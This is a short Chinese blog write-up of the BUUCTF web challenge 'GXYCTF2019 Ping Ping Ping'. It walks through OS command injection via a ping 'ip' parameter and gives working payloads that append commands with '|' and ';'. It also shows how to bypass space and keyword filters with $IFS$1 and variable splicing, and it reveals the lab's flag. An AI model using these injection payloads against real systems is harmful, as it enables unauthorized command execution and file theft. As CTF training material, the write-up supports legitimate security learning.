Buuctf-web-[GXYCTF2019]Ping Ping Ping

首先打开,然后后面跟着 

/?ip=127.0.0.1|ls
找目录

 

 我们看到flag.php与index.php两个php文件。我们接着找flag.php

 

 看到提示空格被禁用绕过空格的方法大概有以下几种:

$IFS$(任意数字)    cat${IFS}$1flag,尝试

 

 发现flag也被骚扰了,然后打开index.php,看看内容

 

 

发现被过滤了好多,然后发现有个变量a,尝试替换拼接flag中的g

/?ip=127.0.0.1;a=g;cat$IFS$1fla$a.php

 

 

flag{61584ea2-f679-45f5-b8c1-32bd1a13a0f5}
posted @ 2020-09-24 21:35  夜布多  阅读(319)  评论(0编辑  收藏  举报